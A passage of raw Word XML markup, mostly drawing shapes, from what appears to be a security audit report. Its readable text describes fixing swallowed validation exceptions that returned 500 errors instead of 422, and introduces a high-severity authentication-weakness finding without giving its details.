                                  <a:pt x="1162050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="135979"/>
                                  <a:pt x="1161120" y="138218"/>
                                  <a:pt x="1159260" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157400" y="141939"/>
                                  <a:pt x="1155155" y="142869"/>
                                  <a:pt x="1152525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>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BE38C61" id="Group 26244" o:spid="_x0000_s1026" style="position:absolute;margin-left:32.2pt;margin-top:12pt;width:165pt;height:11.25pt;z-index:-251448320" coordsize="20955,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&#10;8wAAAHcHAAAAAA==&#10;">
                <v:shape id="Shape 1207" o:spid="_x0000_s1027" style="position:absolute;width:6381;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6381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WuwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NagIx&#10;EL4LfYcwgjdN3EMtW6NoaYsXD6s+wJCMm6WbybJJ1+3bG0HobT6+31lvR9+KgfrYBNawXCgQxCbY&#10;hmsNl/PX/A1ETMgW28Ck4Y8ibDcvkzWWNty4ouGUapFDOJaowaXUlVJG48hjXISOOHPX0HtMGfa1&#10;tD3ecrhvZaHUq/TYcG5w2NGHI/Nz+vUaDlHtzef1m2zVLAuzH6qjvDitZ9Nx9w4i0Zj+xU/3web5&#10;hVrB45t8gtzcAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIZiBa7BAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9525,l628650,v2630,,4875,930,6735,2784c637245,4645,638175,6890,638175,9525r,123825c638175,135979,637245,138218,635385,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,142875"/>
                </v:shape>
                <v:shape id="Shape 1210" o:spid="_x0000_s1028" style="position:absolute;left:9334;width:11621;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1162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5nxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawJB&#10;DMXvgt9hiNCL1Fk9SNk6SimIthfxz8Hewk46u7iTWXemuvrpzUHoLeG9vPfLbNH5Wl2ojVVgA+NR&#10;Boq4CLZiZ+CwX76+gYoJ2WIdmAzcKMJi3u/NMLfhylu67JJTEsIxRwNlSk2udSxK8hhHoSEW7Te0&#10;HpOsrdO2xauE+1pPsmyqPVYsDSU29FlScdr9eQM/fnWOt/vme/vlhs6n+/pcnI7GvAy6j3dQibr0&#10;b35er63gT8bCL9/ICHr+AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANk5fmfHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l1152525,v2630,,4875,930,6735,2784c1161120,4645,1162050,6890,1162050,9525r,123825c1162050,135979,1161120,138218,1159260,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,116205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69184" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49C367A1" wp14:editId="686B60E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2980432</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26245" name="Group 26245"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1213" name="Shape 1213"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4645"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135979"/>
                                  <a:pt x="580095" y="138218"/>
                                  <a:pt x="578235" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141939"/>
                                  <a:pt x="574130" y="142869"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>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9A87D7B" id="Group 26245" o:spid="_x0000_s1026" style="position:absolute;margin-left:234.7pt;margin-top:12pt;width:45.75pt;height:11.25pt;z-index:-251447296" coordsize="581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&#10;">
                <v:shape id="Shape 1213" o:spid="_x0000_s1027" style="position:absolute;width:5810;height:1428;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sSxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLwUzWqL6GoUKwhCD77B47gZ99HNZEmibv99Uyj0Nh/fc6bz1tTiTs6XlhX0ewkI4szq&#10;knMFx8OqOwLhA7LG2jIp+CYP89nz0xRTbR+8o/s+5CKGsE9RQRFCk0rps4IM+p5tiCN3tc5giNDl&#10;Ujt8xHBTy0GSDKXBkmNDgQ0tC8q+9jej4LA7Xd63m3NVjbevC1d9bFafLJXqvLSLCYhAbfgX/7nX&#10;Os4f9N/g95t4gpz9AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI3IWxLEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2784c580095,4645,581025,6890,581025,9525r,123825c581025,135979,580095,138218,578235,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135979,,133350l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Also fixed here, because it was masking this entire class of defect:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> every </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapping a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>validate(</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call caught </w:t>
      </w:r>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Exception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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ValidationException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> extends </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> validation failures were swallowed and returned as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>500 "Failed to update customer"</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Eleven catch clauses now re-throw so the handler renders a proper 422.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14540988" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="106"/>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Both writes → 422, values unchanged, with an actionable error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779AE9AD" w14:textId="77777777" w:rsidR="00E868FD" w:rsidRPr="005C54CB" w:rsidRDefault="00E868FD" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="106"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC91918" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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V-05 · Authentication weaknesses (four sub-findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4ABE6" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="191"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A07:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED36BE5" w14:textId="15C749E8" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="147" w:line="310" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="284"/>
        <w:jc w:val="both"/>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1232" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5ADE5C91" wp14:editId="1F9203D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>399157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-21594</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2781300" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26247" name="Group 26247"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2781300" cy="304800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2781300" cy="304800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1227" name="Shape 1227"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1495425" y="0"/>
                            <a:ext cx="1285875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1285875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1278980" y="0"/>
                                  <a:pt x="1281225" y="930"/>
                                  <a:pt x="1283085" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1284945" y="4645"/>
                                  <a:pt x="1285875" y="6896"/>
                                  <a:pt x="1285875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1285875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1285875" y="126454"/>
                                  <a:pt x="1284945" y="128693"/>
                                  <a:pt x="1283085" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1281225" y="132414"/>
                                  <a:pt x="1278980" y="133344"/>
                                  <a:pt x="1276350"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233" name="Shape 1233"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="228600" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="228600" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="219075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="221705" y="0"/>
                                  <a:pt x="223950" y="930"/>
                                  <a:pt x="225810" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="227670" y="4645"/>
                                  <a:pt x="228600" y="6890"/>
                                  <a:pt x="228600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="228600" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="228600" y="126454"/>
                                  <a:pt x="227670" y="128693"/>
                                  <a:pt x="225810" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="223950" y="132414"/>
                                  <a:pt x="221705" y="133344"/>
                                  <a:pt x="219075" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128693"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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236" name="Shape 1236"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="266700" y="171450"/>
                            <a:ext cx="2438400" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2438400" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2428875" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2431505" y="0"/>
                                  <a:pt x="2433750" y="930"/>
                                  <a:pt x="2435610" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2437470" y="4645"/>
                                  <a:pt x="2438400" y="6890"/>
                                  <a:pt x="2438400" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2438400" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2438400" y="126454"/>
                                  <a:pt x="2437470" y="128693"/>
                                  <a:pt x="2435610" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2433750" y="132414"/>
